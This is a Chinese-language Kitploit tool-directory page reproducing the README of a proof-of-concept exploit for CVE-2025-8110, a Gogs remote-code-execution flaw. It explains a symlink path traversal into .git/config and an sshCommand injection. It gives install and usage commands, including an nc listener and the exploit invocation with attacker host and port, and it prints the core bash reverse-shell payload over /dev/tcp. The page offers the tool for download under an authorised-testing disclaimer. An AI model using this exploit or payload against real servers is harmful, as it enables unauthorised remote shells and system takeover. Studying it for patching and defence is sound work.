Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-8110 — 用于CVE-2025-8110的概念验证利用程序,这是一个Gogs远程代码执行漏洞,利用符号链接进行路径遍历和sshCommand注入以传递反向shell。 | Kitploit
工具/GitHubGitHub/ghxstsec/cve-2025-8110
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubghxstsec/cve-2025-8110

CVE-2025-8110

用于CVE-2025-8110的概念验证利用程序,这是一个Gogs远程代码执行漏洞,利用符号链接进行路径遍历和sshCommand注入以传递反向shell。

查看仓库
5314个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Gogs RCE 漏洞利用 (CVE-2025-8110)

Python License Expertise

针对 CVE-2025-8110 的概念验证 (PoC) 程序,这是 Gogs 中的一个严重漏洞,允许通过符号链接绕过和 sshCommand 注入操纵 .git/config 来实现远程代码执行 (RCE)。

📖 概述

此漏洞利用针对 Gogs API 内容管理中的路径遍历缺陷。已认证用户可以:

  1. 创建一个仓库并推送一个指向内部 .git/config 的符号链接。
  2. 使用 API 通过符号链接覆盖目标配置文件。
  3. 注入恶意的 sshCommand,当服务器执行 Git 操作时触发反向 Shell。

🚀 特性

  • 自动化工作流程:处理登录、仓库创建、符号链接部署和配置投毒。
  • 健壮的编码:自动对凭据进行 URL 编码,以处理特殊字符(例如 !、@)。
  • 丰富输出:使用 Rich 库提供高可见性日志。

🛠 前提条件

  • Python 3.12+
  • 本地系统已安装 Git。
  • 目标 Gogs 实例上的有效凭据。

📦 安装

  1. 克隆仓库:

    root@kitploit:~
    git clone https://github.com/Ghxstsec/CVE-2025-8110.git
    cd CVE-2025-8110
    
  2. 安装依赖:

    root@kitploit:~
    pip3 install -r requirements.txt
    

💻 使用

启动你的监听器:

root@kitploit:~
nc -lvnp 6666

运行漏洞利用:

root@kitploit:~
python3 CVE-2025-8110-RCE.py -u [http://target-gogs.htb:3000](http://target-gogs.htb:3000) -lh <YOUR_IP> -lp 6666 -p 'YourPassword123!'

参数:

漏洞的核心:

sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #

当 Gogs 执行需要网络传输(如镜像同步或内部引用检查)的 Git 命令时,它会调用 sshCommand,从而触发反向 Shell。

⚠️ 法律免责声明:此工具仅供教育和授权安全测试使用。作者对因使用此脚本造成的任何滥用或损害概不负责。未经授权访问计算机系统是非法的。

下载工具
参数描述
-u, --url目标 Gogs 实例的基础 URL(例如 http://target.htb:3000)。
-lh, --host攻击者 IP (LHOST),反向 Shell 将回连到此地址。
-lp, --port在你的机器上配置的监听端口 (LPORT)。
-p, --password用于执行身份验证的 pwnuser 账户密码。
-x, --proxy(可选)通过本地代理路由流量(默认:http://localhost:8080)。